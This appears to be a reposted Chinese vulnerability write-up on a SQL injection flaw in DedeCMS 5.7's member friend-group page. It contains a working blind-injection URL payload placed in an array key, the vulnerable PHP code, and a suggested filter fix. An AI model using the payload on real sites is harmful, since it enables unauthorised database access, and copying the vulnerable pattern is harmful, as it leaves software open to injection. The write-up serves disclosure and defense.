標籤:
catalog
1. 漏洞描述2. 漏洞觸發條件3. 漏洞影響範圍4. 漏洞程式碼分析5. 防禦方法6. 攻防思考
1. 漏洞描述
Dedecms測試人員中樞注入漏洞
Relevant Link
http://exp.03sec.com/dedecms-%E4%BC%9A%E5%91%98%E4%B8%AD%E5%BF%83%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E10.shtml
2. 漏洞觸發條件
1. 先開啟: http://127.0.0.1/dedecms5.7/member/myfriend_group.php2. 隨便添加一個分組: group//查看源碼裡groupname[]中的值,可以發現,這是一個基於索引值key的盲注,因為沒有返回,那麼判斷是否滿足條件就看是否update了原來的資料3. http://127.0.0.1/dedecms5.7/member/myfriend_group.php?dopost=save&groupname[2‘ or @`‘` and (select 1)%3D1 and ‘1]=12222//如果(select 1)=1的話 那個groupname就會被改成12222,上面的2改成你的groupname的ID
3. 漏洞影響範圍
4. 漏洞程式碼分析
/member/myfriend_group.php
elseif ($dopost == ‘save‘){ if(isset($mtypeidarr) && is_array($mtypeidarr)) { $delids = ‘0‘; $mtypeidarr = array_filter($mtypeidarr, ‘is_numeric‘); foreach($mtypeidarr as $delid) { delids .= ‘,‘.$delid; unset($groupname[$delid]); } $query = "DELETE FROM `#@__member_group` WHERE id in ($delids) AND mid=‘$cfg_ml->M_ID‘"; $dsql->ExecNoneQuery($query); $sql="SELECT id FROM `#@__member_friends` WHERE groupid in ($delids) AND mid=‘$cfg_ml->M_ID‘"; $db->SetQuery($sql); $db->Execute(); while($row = $db->GetArray()) { $query2 = "UPDATE `#@__member_friends` SET groupid=‘1‘ WHERE id=‘{$row[‘id‘]}‘ AND mid=‘$cfg_ml->M_ID‘"; $dsql->ExecNoneQuery($query2); } } //索引值$key注入 foreach ($groupname as $id => $name) { $name = HtmlReplace($name); $query = "UPDATE `#@__member_group` SET groupname=‘$name‘ WHERE id=‘$id‘ AND mid=‘$cfg_ml->M_ID‘"; echo $query; $dsql->ExecuteNoneQuery($query); } ShowMsg(‘分組修改完成(刪除分組中的會員會轉移到預設分組中)‘,‘myfriend_group.php‘);}
Relevant Link
http://www.wooyun.org/bugs/wooyun-2014-048923
5. 防禦方法
/member/myfriend_group.php
foreach ($groupname as $id => $name){ $name = HtmlReplace($name); /* 對$id進行過濾 */ $id = HtmlReplace($id); /* */ $query = "UPDATE `#@__member_group` SET groupname=‘$name‘ WHERE id=‘$id‘ AND mid=‘$cfg_ml->M_ID‘"; $dsql->ExecuteNoneQuery($query);}
6. 攻防思考
Copyright (c) 2015 LittleHann All rights reserved
dedecms /member/myfriend_group.php SQL Injection Vul
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
